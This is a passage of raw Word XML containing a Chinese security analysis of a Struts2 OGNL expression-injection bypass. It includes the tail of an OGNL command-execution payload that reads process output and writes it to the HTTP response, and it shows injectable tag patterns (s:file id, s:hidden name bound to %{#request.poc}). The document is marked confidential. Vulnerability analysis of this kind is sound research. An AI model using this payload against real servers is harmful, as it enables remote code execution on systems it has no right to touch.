              </w:rPr>
              <w:t>).getInputStream()).useDelimiter(</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="99CC99"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>'\\\\A'</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>),#str=#s.hasNext()?#s.next():</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="99CC99"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>''</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>,#res.print(#str),#res.close()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="240"/>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这里需要注意的是在一开始的时候我说主要有两类标签属性存在问题，一类是</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，一类是</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的属性可以控制，类似于下面代码</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="95"/>
        <w:gridCol w:w="2459"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidTr="003A5856">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A585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textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A585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CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;s:file id=</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="99CC99"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>"%{#request.poc}"</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> /&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>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lastRenderedPageBreak/>
        <w:t>那么对于的</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>为如下图</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="2CA6CB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FE2CEDB" wp14:editId="3B26A6F0">
            <wp:extent cx="5580380" cy="1873737"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="https://www.iswin.org/attach/struts2_bypasspoc_1.png">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId3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iswin.org/attach/struts2_bypasspoc_1.png">
                      <a:hlinkClick r:id="rId32" tooltip="&quot;&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380" cy="1873737"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="240"/>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如果对应的标签属性为</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>时，代码如下</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="95"/>
        <w:gridCol w:w="3797"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidTr="003A5856">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A585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textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A585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CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;s:hidden name="%{#request.poc}"&gt;&lt;/s:hidden&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>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POC</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>要稍微有点变化，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>属性第二次进行</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OGNL</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>调用时会自动对表达式加上</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>%{}</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>字符，所以对应的</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>为如下图</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="2CA6CB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7670682D" wp14:editId="515978D6">
            <wp:extent cx="5580380" cy="1846516"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="https://www.iswin.org/attach/struts2_bypasspoc_2.png">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId3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iswin.org/attach/struts2_bypasspoc_2.png">
                      <a:hlinkClick r:id="rId34" tooltip="&quot;&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1846516"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="240"/>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不过上述标签的属性值不一定是直接通过参数传进来，具体的利用场景需要结合实际的条件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="312" w:line="240" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[1] :</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://seclab.dbappsecurity.com.cn/?p=678" \t "_blank" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="2CA6CB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>http://seclab.dbappsecurity.com.cn/?p=678</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="007A5775" w:rsidRPr="00E413A6" w:rsidRDefault="007A5775" w:rsidP="00E413A6"/>
    <w:sectPr w:rsidR="007A5775" w:rsidRPr="00E413A6" w:rsidSect="00B07B2B">
      <w:headerReference w:type="even" r:id="rId36"/>
      <w:headerReference w:type="default" r:id="rId37"/>
      <w:footerReference w:type="default" r:id="rId38"/>
      <w:headerReference w:type="first" r:id="rId39"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="1558" w:bottom="993" w:left="156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22B9" w:rsidRDefault="00B422B9" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00B422B9" w:rsidRDefault="00B422B9" w:rsidP="006C2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62F" w:rsidRDefault="006C162F" w:rsidP="006C162F">
    <w:pPr>
      <w:pStyle w:val="a4"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:lang w:val="zh-CN"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidR="00790BA7">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r w:rsidR="00790BA7">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="003A5856">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>9</w:t>
    </w:r>
    <w:r w:rsidR="00790BA7">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:lang w:val="zh-CN"/>
      </w:rPr>
      <w:t xml:space="preserve"> / </w:t>
    </w:r>
    <w:r w:rsidR="00790BA7">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r w:rsidR="00790BA7">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="003A5856">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>9</w:t>
    </w:r>
    <w:r w:rsidR="00790BA7">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w:rsidR="006C162F" w:rsidRDefault="006C162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22B9" w:rsidRDefault="00B422B9" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00B422B9" w:rsidRDefault="00B422B9" w:rsidP="006C23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2934" w:rsidRDefault="00B422B9">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49360" o:spid="_x0000_s2051" type="#_x0000_t136" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:531pt;height:88.5pt;rotation:315;z-index:-251658240;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin" o:allowincell="f" fillcolor="#d8d8d8" stroked="f">
          <v:fill opacity=".5"/>
          <v:textpath style="font-family:&quot;宋体&quot;;font-size:1pt" string="Confidenti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37E" w:rsidRDefault="00B422B9" w:rsidP="0038317E">
    <w:pPr>
      <w:pStyle w:val="a3"/>
      <w:ind w:firstLineChars="3900" w:firstLine="7020"/>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49361" o:spid="_x0000_s2052" type="#_x0000_t136" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:531pt;height:88.5pt;rotation:315;z-index:-251657216;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin" o:allowincell="f" fillcolor="#d8d8d8" stroked="f">
          <v:fill opacity=".5"/>
          <v:textpath style="font-family:&quot;宋体&quot;;font-size:1pt" string="Confidential"/>
          <w10:wrap anchorx="margin" anchory="margin"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r w:rsidR="00624C0C">
      <w:rPr>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:t>③秘密信息 严禁泄露</w:t>
    </w:r>
    <w:r w:rsidR="00400747">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251656192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>23495</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-178435</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1343025" cy="319405"/>
